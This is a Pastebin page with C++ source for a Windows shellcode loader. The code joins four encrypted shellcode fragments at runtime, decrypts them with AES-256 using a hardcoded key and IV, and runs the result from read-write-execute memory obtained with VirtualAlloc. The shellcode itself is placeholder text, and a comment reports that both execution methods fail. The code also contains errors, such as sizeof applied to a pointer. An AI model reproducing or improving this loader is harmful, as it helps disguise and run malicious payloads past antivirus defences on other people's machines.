daily pastebin goal
0%
SHARE
TWEET

Untitled

a guest Jan 23rd, 2019 77 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include "pch.h"
  2. #include <iostream>
  3. #include <stdio.h>
  4. #include <openssl/conf.h>
  5. #include <openssl/evp.h>
  6. #include <openssl/err.h>
  7. #include <Windows.h>
  8. #include <string.h>
  9. #include <time.h>
  10.  
  11. #define SHELLCODE_BUFFER 250000
  12.  
  13.  
  14. void executeShellcode(unsigned char* shellcode) {
  15. int(*ret)() = (int(*)()) shellcode;
  16. ret();
  17. }
  18.  
  19. void executeAllocShellcode(unsigned char* shellcode) {
  20. void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  21. memcpy(exec, shellcode, sizeof(shellcode));
  22. ((void(*)())exec)();
  23. }
  24.  
  25. void handleErrors(void) {
  26. ERR_print_errors_fp(stderr);
  27. abort();
  28. }
  29.  
  30. int decrypt(unsigned char* encrypted, int encryptedLen, unsigned char* key, unsigned char* iv, unsigned char* decrypted) {
  31. EVP_CIPHER_CTX* cipherText;
  32.  
  33. int len, decryptedLen;
  34.  
  35. if (!(cipherText = EVP_CIPHER_CTX_new()))
  36. handleErrors();
  37.  
  38. //Initialize decryption operation
  39. EVP_DecryptInit_ex(cipherText, EVP_aes_256_cbc(), NULL, key, iv);
  40.  
  41. //Decrypt shellcode
  42. EVP_DecryptUpdate(cipherText, decrypted, &len, encrypted, encryptedLen);
  43.  
  44. //Length of encrypted shellcode
  45. decryptedLen = len;
  46.  
  47. //Finalize encryption
  48. EVP_DecryptFinal_ex(cipherText, decrypted + len, &len);
  49.  
  50. //Decrypted shellcode length
  51. decryptedLen += len;
  52.  
  53. //CleanUp
  54. EVP_CIPHER_CTX_free(cipherText);
  55.  
  56. return decryptedLen;
  57. }
  58.  
  59. int main() {
  60. int decryptedLen, encryptedLen; //Length of shellcode
  61.  
  62. //128 bit AES initialization vector
  63. unsigned char iv[] = "K7yT3567Abdlhfru";
  64.  
  65. //256 bit AES key
  66. unsigned char key[] = "Yg2537shsGSTDk2820237ak72bd41453";
  67.  
  68.        unsigned char encrypted1[] = "Shellcode part1....";
  69.        unsigned char encrypted2[] = "Shellcode part2....";
  70.        unsigned char encrypted3[] = "Shellcode part3....";
  71.        unsigned char encrypted4[] = "Shellcode part4....";
  72.  
  73.        // Concat Shellcode on Runtime
  74. unsigned char encrypted[sizeof(encrypted1) + sizeof(encrypted2) + sizeof(encrypted3) + sizeof(encrypted4)];
  75. memcpy(encrypted, encrypted1, sizeof(encrypted1));
  76. memcpy(encrypted + sizeof(encrypted1), encrypted2, sizeof(encrypted2));
  77. memcpy(encrypted + sizeof(encrypted1) + sizeof(encrypted2), encrypted3, sizeof(encrypted3));
  78. memcpy(encrypted + sizeof(encrypted1) + sizeof(encrypted2) + sizeof(encrypted3), encrypted4, sizeof(encrypted4));
  79. encryptedLen = sizeof(encrypted);
  80.  
  81. unsigned char decrypted [sizeof encrypted]; //Buffer for decrypted shellcode
  82.  
  83. //Initialize Openssl
  84. ERR_load_crypto_strings();
  85. OpenSSL_add_all_algorithms();
  86. OPENSSL_config(NULL);
  87.  
  88. //Decrypt shellcode
  89. decryptedLen = decrypt(encrypted, encryptedLen, key, iv, decrypted);
  90.  
  91. //CleanUp
  92. EVP_cleanup();
  93. ERR_free_strings();
  94.  
  95. printf("Decrypted: %s", &decrypted);
  96.  
  97. //Execute shellcode (Tried Both) -> Same error.
  98. //executeShellcode(decrypted);
  99. executeAllocShellcode(decrypted);
  100. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top